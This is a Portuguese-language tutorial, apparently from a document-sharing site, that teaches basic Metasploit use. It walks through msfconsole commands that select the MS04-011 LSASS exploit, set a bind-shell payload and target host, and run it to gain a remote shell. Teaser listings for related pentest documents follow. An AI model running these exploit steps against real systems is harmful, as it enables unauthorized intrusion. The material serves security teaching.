Tutoriais de Segurança de Redes

Tamanho: px
Começar a partir da página:

Download "Tutoriais de Segurança de Redes"

Transcrição

1 Tutoriais de Segurança de Redes Ricardo Kléber Lição 01 :: Metasploit Básico Iniciando uma série de lições de utilização de soluções/ferramentas para a prática de segurança de redes, este primeiro tutorial foca na Ferramenta Metasploit, disponível em sua última versão (4.4) no LiveDVD Forense Backtrack5R3. O Metasploit, por si só, já valeria um LiveCD, pelo conjunto de funcionalidades que oferece. O principal objetivo desses tutoriais é a popularização da cultura de segurança e a troca de informações na área, principalmente entre estudantes de cursos de computação, embora a linguagem e a abordagem utilizados busquem simplificar conceitos e ferramentas a ponto de atrair leitores de outras áreas do conhecimento. O Que é Metasploit? De acordo com o seu próprio site oficial (www.metasploit.com) o Metasploit Framework é uma plataforma avançada Open Source, desenvolvida especificamente com o objetivo de potencializar e agilizar o desenvolvimento, testes e utilização de exploits. O projeto desse framework, que segundo seus criadores nasceu como um jogo, tem demonstrado um crescimento espetacular, especialmente a partir da versão 2.2, dando-lhe lugar privilegiado entre os kits de ferramentas de todos os profissionais da área de segurança da informação. Como a maioria de seus componentes são escritos na linguagem Perl, outros ainda desenvolvidos em C e Assembler, sua portabilidade está assegurada, aspecto que contribui em grande parte para a sua aceitação massiva, pois pode ser utilizado em praticamente todas as plataformas Unix-Like, BSD, MacOS X, Windows, etc. Um outro aspecto interessante é o licenciamento a partir da versão 2.3 do Metasploit Framework, baseado tanto na GPL v2 como na Perl Artistic Licences, permitindo sua utilização tanto em projetos Open Source como em projetos comerciais. O foco principal do Metasploit Framework é a área de Penetration Test (PenTest) ou, em português, Testes de Penetração, atividade cada vez mais recomendada tanto por equipes de segurança internas nas instituições, com vistas a testar a aplicação de suas políticas de segurança, como por empresas de consultoria especializada que oferecem esse tipo de serviço a outras, com vistas a buscar explorar vulnerabilidades a partir de ambientes externos, simulando o comportamento de eventuais atacantes, antes que esses ataques, de fato, ocorram. Em 21 de outubro de 2009, a empresa de segurança Rapid7 adquiriu o projeto Metasploit mantendo, porém, uma equipe de desenvolvimento em tempo integral e o todo o código fonte sob licença BSD. Estudantes (e curiosos) podem utilizar o Metasploit Framework incorporando a ele novas funcionalidades, uma vez que, em função de sua licença, podem modificar, customizar ou apenas estudar suas linhas de código internas para entender o seu funcionamento. Mesmo com todas as suas ferramentas oferecidas gratuitamente para uso, o Metasploit Framework é uma excelente solução corporativa, comparável às grande soluções comerciais proprietárias (e caras) utilizadas para o mesmo objetivo. Instalando o Metasploit Framework Se o desejo é instalar o Metasploit Framework, como dito anteriormente a instalação pode ser realizada tanto em sistemas baseados em Unix/Linux como no MS-Windows, dentre outros. Em ambos os dois primeiros sistemas citados (com maior número de usuários), os instaladores dispõem de telas de ajuda (wizards) sendo que, no caso do Windows, a instalação é feita sobre uma versão do software Cygwin customizado que, após configurado, realiza a instalação e configuração do Metasploit Framework normalmente, a partir de um arquivo executável ( metasploit-latest-windows-installer.exe ). No caso do Unix/Linux, o usuário pode baixar e instalar a partir do site oficial a última versão do Metasploit Framework ( metasploit-latest-linuxinstaller.run ), descompactar e instalar. Este tutorial não detalhará os demais passos da instalação (em quaisquer das arquiteturas) uma vez que subentende que o usuário está fazendo uso do LiveCD Backtrack5R3 que já dispõe da ferramenta instalada e configurada, pronta para uso.

2 Atualizando o Metasploit Framework O Metasploit Framework traz, como parte de seus componentes, uma série de exploits prontos para utilizar. Uma vez que novas vulnerabilidades surgem a cada instante, naturalmente novos exploits (para explorar essas vulnerabilidades) também devem surgir, tornando o framework constantemente desatualizado, necessitando de atualização constante. Essa atualização é possível uma vez que várias comunidades, grupos e instituições mantém atividades constantes de identificação, classificação e disponibilização de informações relacionadas a novas vulnerabilidades, bem como dos exploits para a sua exploração. Esses exploits podem ser adicionados facilmente ao Metasploit Framework através de um dos utilitários da ferramenta chamado msfupdate adicionada como parte da instalação padrão do Metasploit Framework a partir da versão 2.2. A sua utilização é bastante simples, como exemplificado a seguir: # msfupdate u Quando executado, o msfupdate exibe informações sobre as últimas novidades e solicita a confirmação para realizar o procedimento de atualização (adição dos novos exploits disponíveis publicamente ao Metasploit Framework). Apresentações (Interfaces) do Metasploit Framework O Metasploit Framework disponibiliza 4 (quatro) interfaces distintas para interação com suas ferramentas/funcionalidades disponíveis: Interface de Linha de Comando: Forma mais tradicional de interação com o framework, iniciada a partir do comando msfcli. Interface de Console: Disponibiliza um prompt do Metasploit, e é iniciada a partir do comando msfconsole Interface Web: Indicada para necessidades de interação com a ferramenta a partir de máquinas remotas (via browser) e/ou por mais de um usuário, como em situações em que as ferramentas necessitam ser executadas por equipes. Para a disponibilização dessa interface o Metasploit disponibiliza seu próprio servidor http podendo ser configurado, se necessário, para restringir o acesso a clientes (browsers) a partir da identificação de IPs e/ou senhas de acesso à interface. Interface Web: Inicialmente acionada a partir do comando msfgui a interface gráfica do Metasploit surgiu em 2010, sendo substituída, posteriormente, pela interface Armitage, padrão utilizado na versão atual do Metasploit Framework. Lançando um Exploit Utilizando a interface de console do Metasploit Framework apresentamos, a seguir, um exemplo prático de utilização de um exploit específico. # msfconsole O Metasploit Framework apresentará um banner da ferramenta (Figura 01) indicando a versão instalada da ferramenta, quantidade de exploits e payloads disponíveis e, em seguida, o console ( msf > ) de interação aguardando a digitação do comando. / \ / \ /_/ \ / \ \ / \ _ \ \ \/ \ /\ / \ / _ _ _ / \ \ \ _ \ / _ / / \ \/ /\ \ / \/ \ _\ \ \ =[ metasploit v4.5.0 dev [core:4.5 api:1.0] + =[ 927 exploits 499 auxiliary 151 post + =[ 251 payloads 28 encoders 8 nops =[ svn r15728 updated 100 days ago ( ) Warning: This copy of the Metasploit Framework was last updated 100 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see: https://community.rapid7.com/docs/doc 1306 msf > Figura 01 Banner de Apresentação da Interface msfconsole

3 Como o comando/funcionalidade a ser digitado presume o conhecimento prévio de sua sintaxe e funcionalidade, para exibir informações sobre as opções disponíveis sugere-se, inicialmente, a digitação do comando help, cujo resultado exibirá a descrição de cada um dos comandos e seus resultados esperados. msf> help Conforme apresentado pelo comando help, para exibir, por exemplo, a lista de exploits disponíveis, devese digitar o comando show exploits : msf> show exploits O resultado desse comando é uma lista dos exploits (Figura 02) instalados/disponíveis na ferramenta. windows/ftp/oracle9i_xdb_ftp_pass great Oracle 9i XDB FTP PASS Overflow (win32) windows/ftp/proftp_banner normal ProFTP 2.9 Banner Remote Buffer Overflow windows/ftp/sasser_ftpd_port average Sasser Worm avserve FTP PORT Buffer Overflow windows/http/apache_mod_rewrite_ldap great Apache module mod_rewrite LDAP protocol Buffer Overflow windows/http/php_apache_request_headers_bof normal PHP apache_request_headers Function Buffer Overflow windows/iis/iis_webdav_upload_asp excellent Microsoft IIS WebDAV Write Access Code Execution windows/iis/ms02_065_msadc normal Microsoft IIS MDAC msadcs.dll RDS DataStub Content Type Overflow windows/iis/ms03_007_ntdll_webdav great Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow windows/iis/msadc excellent Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution windows/mssql/ms02_039_slammer good Microsoft SQL Server Resolution Overflow windows/smb/ms04_011_lsass good Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow windows/smb/ms06_066_nwapi good Microsoft Services MS nwapi32.dll Module Exploit windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path Stack Corruption windows/wins/ms04_045_wins great Microsoft WINS Service Memory Overwrite (...) msf > Figura 02 Lista de Exploits instalados/disponíveis O uso de um exploit específico pode ser feito utilizando-se o comando use seguido do módulo de exploração (exploit) que se deseja utilizar: msf> use exploit/windows/smb/ms04_011_lsass Para mais informações sobre o módulo de exploit selecionado para utilização, pode-se utilizar a instrução info. Isso apresentará informações adicionais sobre o módulo. msf exploit(ms04_011_lsass)> info Como resultado (Figura 03) obteremos informações detalhadas sobre o módulo, como: Nome detalhado do módulo Caminho absoluto para acesso ao módulo Versão Plataforma-Alvo Tipo de Licença Endereço ( ) do desenvolvedor/mantenedor do módulo Versões afetadas pela vulnerabilidade (targets) Outras opções disponíveis para configuração (porta local / porta remota / IP local / IP remoto) Descrição detalhada do módulo Referências aos boletins de segurança publicados sobre a vulnerabilidade (CVE, Securityfocus, OSVDB, Microsoft Technet, etc).

4 Name: Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow Module: exploit/windows/smb/ms04_011_lsass Version: Platform: Windows Privileged: Yes License: Metasploit Framework License (BSD) Rank: Good Provided by: hdm Available targets: Id Name 0 Automatic Targetting 1 Windows 2000 English 2 Windows XP English Basic options: Name Current Setting Required Description RHOST yes The target address RPORT 445 yes Set the SMB service port Payload information: Space: 1024 Avoid: 7 characters Description: This module exploits a stack buffer overflow in the LSASS service, this vulnerability was originally found by eeye. When re exploiting a Windows XP system, you will need need to run this module twice. DCERPC request fragmentation can be performed by setting 'FragSize' parameter. References: bin/cvename.cgi?name= mspx msf exploit(ms04_011_lsass) > Figura 03 Exemplo de saída da instrução info Uma vez selecionado o exploit, deve-se indicar qual o Shellcode ( Payload ), ou seja, a carga que será executada pelo Metasploit Framework caso a exploração da vulnerabilidade seja bem sucedida. Para informações sobre os Payloads disponíveis pode-se digitar show payloads (Figura 04): msf exploit(ms04_011_lsass)> show payloads Compatible Payloads =================== Name Rank Description generic/custom normal Custom Payload generic/debug_trap normal Generic x86 Debug Trap generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline generic/tight_loop normal Generic x86 Tight Loop windows/adduser normal Windows Execute net user /ADD windows/dllinject/bind_tcp normal Reflective DLL Injection, Bind TCP Stager windows/dllinject/reverse_http normal Reflective DLL Injection, Reverse HTTP Stager windows/dllinject/reverse_tcp normal Reflective DLL Injection, Reverse TCP Stager windows/exec normal Windows Execute Command windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager windows/shell/reverse_http normal Windows Command Shell, Reverse HTTP Stager windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline (...) msf exploit(ms04_011_lsass) > Figura 04 Exemplos de Payloads disponíveis

5 Pode-se utilizar, ainda o comando info para obter informações adicionais de cada Payload, de modo a selecionar o mais conveniente para cada caso. Dando continuidade aos comandos selecionados como exemplo, selecionando, por exemplo, o payload win32_bind, caso a vulnerabilidade seja explorada com sucesso, a execução do exploit resultará na disponibilização de uma shell no sistema remoto. A seleção do payload específico é feita através do comando set : msf exploit(ms04_011_lsass)> set PAYLOAD generic/shell_bind_tcp Assim, uma vez listados os exploits e payloads disponíveis, tendo-se obtido mais informações sobre cada um deles, e escolhidas as opções específicas (Exploit: ms04_011_lsass e Payload: shell_bind_tcp) pode-se/devese solicitar ao Metasploit Framework as informações complementares disponíveis para finalizar o processo de informação de dados para o uso do exploit, utilizando o comando show options. msf exploit(ms04_011_lsass)> show options O resultado (como exemplificado na Figura 05) apresentará as variáveis/opções complementares disponíveis antes de executar o exploit/payload. Module options (exploit/windows/smb/ms04_011_lsass): Name Current Setting Required Description RHOST yes The target address RPORT 445 yes Set the SMB service port Payload options (generic/shell_bind_tcp): Name Current Setting Required Description LPORT 4444 yes The listen port RHOST no The target address Exploit target: Id Name 0 Automatic Targetting msf exploit(ms04_011_lsass) > Figura 05 Exemplos de opções complementares Em alguns casos, parte dessas opções já disponibilizam automaticamente valores sugeridos (default), porém, algumas opções necessitam ser preenchidas, como o IP da máquina alvo (RHOST = Remote Host) ou a porta local que será utilizada para interagir com o host remoto (LPORT = Local Port). Para informar os valores dessas variáveis deve-se utilizar o comando set para cada um deles, como no exemplo a seguir: msf exploit(ms04_011_lsass)> set RHOST Após a informação do valor da variável, pode-se/deve-se utilizar novamente o comando show options para verificar se o valor foi corretamente informado, bem como para verificar se existem outras variáveis que ainda necessitam que seus valores sejam informados: msf exploit(ms04_011_lsass)> show options Estando tudo configurado corretamente pode-se, finalmente, executar o exploit informando o comando exploit e aguardando o seu resultado. msf exploit(ms04_011_lsass)> exploit

6 Se a operação foi bem sucedida, o Metasploit Framework disponibilizará um interpretador de comandos (shell) que, nesse caso, poderá ser utilizado a partir da conexão na porta local (LPORT) Assim, a vulnerabilidade foi explorada com sucesso e o usuário poderá explorar o acesso remoto ao host selecionado a partir de uma shell em sua estação local. Finalizando... O exemplo apresentado nesta lição ilustra apenas uma simulação de exploração de vulnerabilidade a partir de uma das interfaces disponíveis no Metasploit Framework. Todo o processo é, de fato, como aqui ilustrado, bastante simples: Identificação da vulnerabilidade a explorar Seleção da Interface do Metasploit Seleção do Exploit a Utilizar Seleção do Payload Configuração de parâmetros adicionais Execução do Exploit Exploração da vulnerabilidade Outros módulos, não necessariamente de exploração de vulnerabilidades, como por exemplo os módulos de varreduras (scan) de portas e/ou de vulnerabilidades também estão disponíveis na ferramenta e podem ser utilizados a partir de passos semelhantes aos do exemplo aqui apresentado. Cabe reforçar a importância do primeiro passo apresentado nesta lição: a atualização dos módulos do Metasploit Framework. Isso permitirá manter a ferramenta sempre preparada para a exploração das últimas vulnerabilidades encontradas a partir dos exploits específicos para cada uma delas. Ricardo Kléber Martins Galvão é bacharel em Ciências da Computação e mestre em Engenharia Elétrica, professor de disciplinas de segurança de redes e perícia forense computacional no curso de Tecnologia em Redes de Computadores do Instituto Federal de Educação, Ciência e Tecnologia do RN, atuando desde 1998 na área de segurança de redes, ministrando palestras, treinamentos e consultorias na área, tendo atuado como Security Officer da Universidade Federal do Rio Grande do Norte, Diretor de Redes do Detran/PE e professor em cursos de especialização em Segurança da Informação e Computação Forense em diversas faculdades do país. É usuário do sistema operacional Linux desde 1996 e atualmente é Diretor Acadêmico de Gestão e Tecnologia da Informação do IFRN / Câmpus Natal Central.

Metasploit Sabe o que é?

Metasploit Sabe o que é? Metasploit Sabe o que é? é uma plataforma que permite a verificação do estado da segurança dos computadores existentes numa determinada rede, permitindo atacar as falhas de segurança existentes nos mais

Leia mais

O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos

O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos computadores existentes numa determinada rede, permitindo

Leia mais

Analisar e demonstrar a aplicação da ferramenta Metasploit. Vmware Player, Putty, Backtrack, Windows Server 2003, CentOS e Metasploit.

Analisar e demonstrar a aplicação da ferramenta Metasploit. Vmware Player, Putty, Backtrack, Windows Server 2003, CentOS e Metasploit. Unidade Curricular Segurança em Redes Prof. Eduardo Maroñas Monks Aluno Gérson Porciúncula Siqueira Roteiro de Laboratório Ferramentas de Segurança - Metasploit Objetivo: Analisar e demonstrar a aplicação

Leia mais

Metasploit Framework Versão 2.2 User Crash Course

Metasploit Framework Versão 2.2 User Crash Course Metasploit Framework Versão 2.2 User Crash Course Introdução Este documento é uma tentativa de prover um guia do usuário para a versão 2.2 do Metasploit Framework e tem como principais objetivos dar uma

Leia mais

TRABALHO INTRUSÃO DE REDES

TRABALHO INTRUSÃO DE REDES TRABALHO INTRUSÃO DE REDES Software Metasploit Framework O que é > Metasploit Framework é uma avançada plataforma Open Source, concebida especificamente com o objetivo de reforçar e acelerar o desenvolvimento,

Leia mais

Desenvolvendo MetasploitScanHTTP.pl para falhas HTTPS vulneráveis ao Metasploit. Inj3cti0n P4ck3t

Desenvolvendo MetasploitScanHTTP.pl para falhas HTTPS vulneráveis ao Metasploit. Inj3cti0n P4ck3t Desenvolvendo MetasploitScanHTTP.pl para falhas HTTPS vulneráveis ao Metasploit Inj3cti0n P4ck3t São Paulo 2010 Nome: Fernando Henrique Mengali de Souza Contato: fer_henrick@hotmail.com Linguagem de Programação:

Leia mais

Criando scanner para Oracle vulneráveis a exploits do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t

Criando scanner para Oracle vulneráveis a exploits do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t Criando scanner para Oracle vulneráveis a exploits do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t São Paulo 2010 Nome: Fernando Henrique Mengali de Souza Contato: fer_henrick@hotmail.com Linguagem de

Leia mais

Criando scanner para FreeSSHd vulnerável ao exploit do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t

Criando scanner para FreeSSHd vulnerável ao exploit do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t Criando scanner para FreeSSHd vulnerável ao exploit do Metasploit Inj3cti0n P4ck3t. Inj3cti0n P4ck3t São Paulo 2010 Nome: Fernando Henrique Mengali de Souza Contato: fer_henrick@hotmail.com Linguagem de

Leia mais

Segurança exposta em Rede de Computadores. Security displayed in Computer network

Segurança exposta em Rede de Computadores. Security displayed in Computer network Segurança exposta em Rede de Computadores Security displayed in Computer network Luiz Alexandre Rodrigues Vieira Graduando em: (Tecnologia em Redes e Ambientes Operacionais) Unibratec - União dos Institutos

Leia mais

Curso Pentest Profissional

Curso Pentest Profissional Ementa Oficial do Curso Pentest Profissional Capítulo 01 Introdução Mercado de Segurança da Informação (Pentest) Preparação Entender o cliente Definir o escopo e limitações Janela de testes Contato Responsabilidades

Leia mais

0x02 Versões de FTPs vulneráveis aos exploits do Metasploit Framework

0x02 Versões de FTPs vulneráveis aos exploits do Metasploit Framework Author: Inj3cti0n P4ck3t Date: 11/10/10 Nome do Artigo: Criando Scanner para Dectar FTPs vulneráveis ao Metasploit Contato: fer_henrick@hotmail.com Linguagem de Programação: Perl (Practical Extraction

Leia mais

Ementa Completa. Introdução

Ementa Completa. Introdução Ementa Completa Introdução Mercado de Segurança da Informação (Pentest) Preparação Entender o cliente Definir o escopo e limitações Janela de testes Contato Responsabilidades Autorização Non-Disclosure

Leia mais

Fundamentos de Ethical Hacking EXIN

Fundamentos de Ethical Hacking EXIN Exame Simulado Fundamentos de Ethical Hacking EXIN Edição Augusto 2015 Copyright 2015 EXIN Todos os direitos reservados. Nenhuma parte desta publicação pode ser publicado, reproduzido, copiado ou armazenada

Leia mais

Metasploit Hands On. Rafael Soares Ferreira Clavis Segurança da Informação

Metasploit Hands On. Rafael Soares Ferreira Clavis Segurança da Informação Metasploit Hands On Rafael Soares Ferreira Clavis Segurança da Informação rafael@clavis.com.br $ whoami Grupo Clavis Sócio Diretor Técnico Análise forense computacional Detecção e resposta a incidentes

Leia mais

AVDS Vulnerability Management System

AVDS Vulnerability Management System DATA: Agosto, 2012 AVDS Vulnerability Management System White Paper Brazil Introdução Beyond Security tem o prazer de apresentar a nossa solução para Gestão Automática de Vulnerabilidade na núvem. Como

Leia mais

Andarta - Guia de Instalação. Guia de Instalação

Andarta - Guia de Instalação. Guia de Instalação Guia de Instalação 29 de setembro de 2010 1 Sumário Introdução... 3 Os Módulos do Andarta... 4 Instalação por módulo... 6 Módulo Andarta Server... 6 Módulo Reporter... 8 Módulo Agent... 9 Instalação individual...

Leia mais

Algumas das características listada nela:

Algumas das características listada nela: Fazendo varredura e levantando vulnerabilidades com Nikto 5 DE NOVEMBRO DE 2015 O Nikto é uma ferramenta em Perl desenvolvida por Chris Solo e David Lodge, a qual foi escrita para validação de vulnerabilidade

Leia mais

INTRODUÇÃO: 1 - Conectando na sua conta

INTRODUÇÃO: 1 - Conectando na sua conta INTRODUÇÃO: Com certeza a reação da maioria dos que lerem esse mini manual e utilizarem o servidor vão pensar: "mas porque eu tenho que usar um console se em casa eu tenho uma interface gráfica bonito

Leia mais

PARANÁ GOVERNO DO ESTADO

PARANÁ GOVERNO DO ESTADO PROTOCOLOS DA INTERNET FAMÍLIA TCP/IP INTRODUÇÃO É muito comum confundir o TCP/IP como um único protocolo, uma vez que, TCP e IP são dois protocolos distintos, ao mesmo tempo que, também os mais importantes

Leia mais

Instalando o IIS 7 no Windows Server 2008

Instalando o IIS 7 no Windows Server 2008 Goiânia, 16/09/2013 Aluno: Rafael Vitor Prof. Kelly Instalando o IIS 7 no Windows Server 2008 Objetivo Esse tutorial tem como objetivo demonstrar como instalar e configurar o IIS 7.0 no Windows Server

Leia mais

Instalando o IIS 7 no Windows Server 2008

Instalando o IIS 7 no Windows Server 2008 Goiânia, 16/09/2013 Aluno: Rafael Vitor Prof. Kelly Instalando o IIS 7 no Windows Server 2008 Objetivo Esse tutorial tem como objetivo demonstrar como instalar e configurar o IIS 7.0 no Windows Server

Leia mais

Tarefas práticas da disciplina

Tarefas práticas da disciplina Tarefas práticas da disciplina Objetivo: As atividades têm por objetivo consolidar os conceitos de redes de computadores, aplicando os conceitos teóricos de forma a desenvolver no estudante a capacidade

Leia mais

Sumário. 1. Instalação GVcollege... 4. 1.1. GVsetup... 4. 1.1.1. Instalação com Banco de dados... 6. 1.2. Configurações... 10

Sumário. 1. Instalação GVcollege... 4. 1.1. GVsetup... 4. 1.1.1. Instalação com Banco de dados... 6. 1.2. Configurações... 10 Sumário 1. Instalação GVcollege... 4 1.1. GVsetup... 4 1.1.1. Instalação com Banco de dados... 6 1.2. Configurações... 10 1.2.1. APS Licence Service... 11 1.2.2. APS Licence File... 11 1.2.3. DBXconfig...

Leia mais

Documentação Symom. Agente de Monitoração na Plataforma Windows

Documentação Symom. Agente de Monitoração na Plataforma Windows Documentação Symom de Monitoração na Plataforma Windows Windows Linux Windows Linux Plataforma Windows Instalação A instalação do de Monitoração do Symom para Windows é feita através do executável setup.exe

Leia mais

Segredos do Hacker Ético

Segredos do Hacker Ético Marcos Flávio Araújo Assunção Segredos do Hacker Ético 2 a Edição Visual Books Sumário Prefácio... 21 Introdução... 23 1 Entendendo o Assunto... 25 1.1 Bem-vindo ao Obscuro Mundo da Segurança Digital...25

Leia mais

Metasploit Framework: Software Livre para PoC de Vulnerabilidades

Metasploit Framework: Software Livre para PoC de Vulnerabilidades Metasploit Framework: Software Livre para PoC de Vulnerabilidades Apresentação Luiz Vieira Construtor 4Linux Consultor de Segurança 16 anos de experiência em TI Pen-Tester, Perito Forense Articulista sobre

Leia mais

EXPLOITS E FERRAMENTAS PARA SUA UTILIZAÇÃO. Cassio Henrique Feltrin Nunes

EXPLOITS E FERRAMENTAS PARA SUA UTILIZAÇÃO. Cassio Henrique Feltrin Nunes EXPLOITS E FERRAMENTAS PARA SUA UTILIZAÇÃO Cassio Henrique Feltrin Nunes FATEC OURINHOS Faculdade de Tecnologia de Ourinhos Av. Vitalina Marcusso, 1400 Campus Universitário CEP 19910-206 Ourinhos, SP Brasil

Leia mais

Como atualizar o arquivo de licença do HSC ISS Free

Como atualizar o arquivo de licença do HSC ISS Free Como atualizar o arquivo de licença do HSC ISS Free Introdução Após instalar a versão gratuita do HSC Internet Secure Suite (HSC ISS Free), o cliente adquiriu uma licença de uso Standard ou Enterprise

Leia mais

Aluno: Paulo Roberto Alves de Oliveira Trabalho da disciplina Segurança em Windows 2010. Comparativo entre Apache e IIS.

Aluno: Paulo Roberto Alves de Oliveira Trabalho da disciplina Segurança em Windows 2010. Comparativo entre Apache e IIS. Aluno: Paulo Roberto Alves de Oliveira Trabalho da disciplina Segurança em Windows 2010 Comparativo entre Apache e IIS. Apache versus IIS 1. Resumo Os programas de computador Apache, da fundação Apache

Leia mais

Guia de Instalação SIAM. Internet Information Services - IIS 5.1 no Windows XP Pro

Guia de Instalação SIAM. Internet Information Services - IIS 5.1 no Windows XP Pro Guia de Instalação SIAM Internet Information Services - IIS 5.1 no Windows XP Pro Documento Gerado por: Amir Bavar Criado em: 06/04/2007 Última modificação: 26/09/2008 Índice: 1. Introdução 2. Lista de

Leia mais

Tarefas práticas da disciplina

Tarefas práticas da disciplina Tarefas práticas da disciplina Objetivo: As atividades têm por objetivo consolidar o conhecimento de redes de computadores adquirido em aula, aplicando os conceitos teóricos com vistas a desenvolver no

Leia mais

Backup dos Bancos de Dados Interbase

Backup dos Bancos de Dados Interbase Backup dos Bancos de Dados Interbase Interbase... O que é? InterBase é um gerenciador de Banco de dados relacionais da Borland. O Interbase é uma opção alternativa aos bancos de dados tradicionais como

Leia mais

Integrando Eclipse e Websphere Application Server Community Edition

Integrando Eclipse e Websphere Application Server Community Edition 1 Integrando Eclipse e Websphere Application Server Community Edition Sobre o Autor Carlos Eduardo G. Tosin (carlos@tosin.com.br) é formado em Ciência da Computação pela PUC-PR, pós-graduado em Desenvolvimento

Leia mais

LEIA-ME PRIMEIRO Instalação do Fiery WorkCentre Série 7300

LEIA-ME PRIMEIRO Instalação do Fiery WorkCentre Série 7300 LEIA-ME PRIMEIRO Instalação do Fiery WorkCentre Série 7300 Este documento descreve como instalar e configurar o Controlador de rede Fiery para WorkCentre Série 7300. Complete as etapas que correspondem

Leia mais

UniFOA Centro Universitário de Volta Redonda Prof. Érick de S. Carvalho LabBD2_4P_Aula02A

UniFOA Centro Universitário de Volta Redonda Prof. Érick de S. Carvalho LabBD2_4P_Aula02A 1 Veremos os principais tipos de objetos de um banco de dados, com ênfase nos segmentos, começando pelo segmento do tipo table (tabela). 2 OUI - Oracle Universal Installer - Permite Instalar, Remover e

Leia mais

Entendendo e Mitigando Ataques Baseados em HTTP Parameter Pollution (HPP)

Entendendo e Mitigando Ataques Baseados em HTTP Parameter Pollution (HPP) Entendendo e Mitigando Ataques Baseados em HTTP Parameter Pollution (HPP) 05/12/2009 Ricardo Kléber M. Galvão rk@cefetrn.br Aplicações Web Modernas (3 Camadas) Cliente Aplicação Web Browser Microsoft IIS

Leia mais

INSTALAÇÃO PRINTERTUX Tutorial

INSTALAÇÃO PRINTERTUX Tutorial INSTALAÇÃO PRINTERTUX Tutorial 2 1. O Sistema PrinterTux O Printertux é um sistema para gerenciamento e controle de impressões. O Produto consiste em uma interface web onde o administrador efetua o cadastro

Leia mais

TUTORIAL: MANTENDO O BANCO DE DADOS DE SEU SITE DENTRO DO DOMÍNIO DA USP USANDO O SSH!

TUTORIAL: MANTENDO O BANCO DE DADOS DE SEU SITE DENTRO DO DOMÍNIO DA USP USANDO O SSH! UNIVERSIDADE DE SÃO PAULO (USP) ESCOLA DE ARTES, CIÊNCIAS E HUMANIDADES (EACH) TUTORIAL: MANTENDO O BANCO DE DADOS DE SEU SITE DENTRO DO DOMÍNIO DA USP USANDO O SSH! Autoria e revisão por: PET Sistemas

Leia mais

Instalação do VOL Backup para Sistemas Unix-Like

Instalação do VOL Backup para Sistemas Unix-Like Este é o guia de instalação e configuração da ferramenta VOL Backup para Sistemas Unix-Like. Deve ser seguido caso você queira instalar ou reinstalar o VOL Backup em sistemas Linux, Solaris ou BSD. Faça

Leia mais

[Manual de Instalación]

[Manual de Instalación] Todos los derechos reservados Aranda Software www.arandasoft.com [1] INTRODUÇÃO Bem-vindo no novo sistema de apoio de controle total de impressões dentro da sua empresa, desenvolvido pelo equipo de trabalho

Leia mais

Manual de Instalação

Manual de Instalação Manual de Instalação Índice 1) Passo: Instalação do MySQL Server... 2 2) Passo: Instalação do MySQL Query Browser... 9 3) Passo: Instalação do Dotnetfx 2.0 ou versão superior.... 13 4) Passo: Instalação

Leia mais

Trabalhando com NAT no PFSense

Trabalhando com NAT no PFSense Trabalhando com NAT no PFSense Este artigo está sendo feito para Divulgar o Curso PFSense presencial, que irá ocorrer em fevereiro 23, com duração de 10 dias, indo até dia 6 de Março, com horário entre

Leia mais

Tutorial de TCP/IP Parte 21 Roteiro Para Resolução de Problemas

Tutorial de TCP/IP Parte 21 Roteiro Para Resolução de Problemas Introdução: Tutorial de TCP/IP Parte 21 Roteiro Para Resolução de Problemas Prezados leitores, esta é a primeira parte, desta segunda etapa dos tutoriais de TCP/IP. As partes de 01 a 20, constituem o módulo

Leia mais

Ferramenta para gerenciamento de impressão CURUPIRA

Ferramenta para gerenciamento de impressão CURUPIRA #20 Ferramenta para gerenciamento de impressão CURUPIRA VITEC Versão 1.0 Agosto/2007 1 Revisões Versão Data Descrição 1.0.0 03/08/2007 Elaboração do Manual. Página 2 de 18 Índice 1 REVISÕES... 2 2 PRÉ-REQUISITOS...

Leia mais

Instalação do TOTVS ESB. Guia de Instalação do TOTVS ESB

Instalação do TOTVS ESB. Guia de Instalação do TOTVS ESB Guia de Instalação do TOTVS ESB Copyright 2011 TOTVS S.A. Todos os direitos reservados. Nenhuma parte deste documento pode ser copiada, reproduzida, traduzida ou transmitida por qualquer meio eletrônico

Leia mais

SCPIWeb. SCPIWebDespRec Aplicação Web para Consulta de Despesas e Receitas ( Lei Complementar nº 131 de 27 Maio de 2009 )

SCPIWeb. SCPIWebDespRec Aplicação Web para Consulta de Despesas e Receitas ( Lei Complementar nº 131 de 27 Maio de 2009 ) 2010 SCPIWebDespRec Aplicação Web para Consulta de Despesas e Receitas ( Lei Complementar nº 131 de 27 Maio de 2009 ) SCPIWebCotacao Aplicação Web para Cotação de Preços via Internet Resumo de Instruções

Leia mais

Testes de Software. Anne Caroline O. Rocha TesterCertified BSTQB NTI UFPB. Anne Caroline O. Rocha Tester Certified BSTQB NTI UFPB

Testes de Software. Anne Caroline O. Rocha TesterCertified BSTQB NTI UFPB. Anne Caroline O. Rocha Tester Certified BSTQB NTI UFPB Testes de Software 1 AULA 04 FERRAMENTAS DE AUTOMAÇÃO DE TESTES FUNCIONAIS Anne Caroline O. Rocha TesterCertified BSTQB NTI UFPB Conteúdo Programático Aula 04 Automação de testes funcionais Ferramentas

Leia mais

Programação Orientada a Objetos com PHP & MySQL Sistema Gerenciador de Banco de Dados: Introdução e configuração de bases de dados com Postgre e MySQL

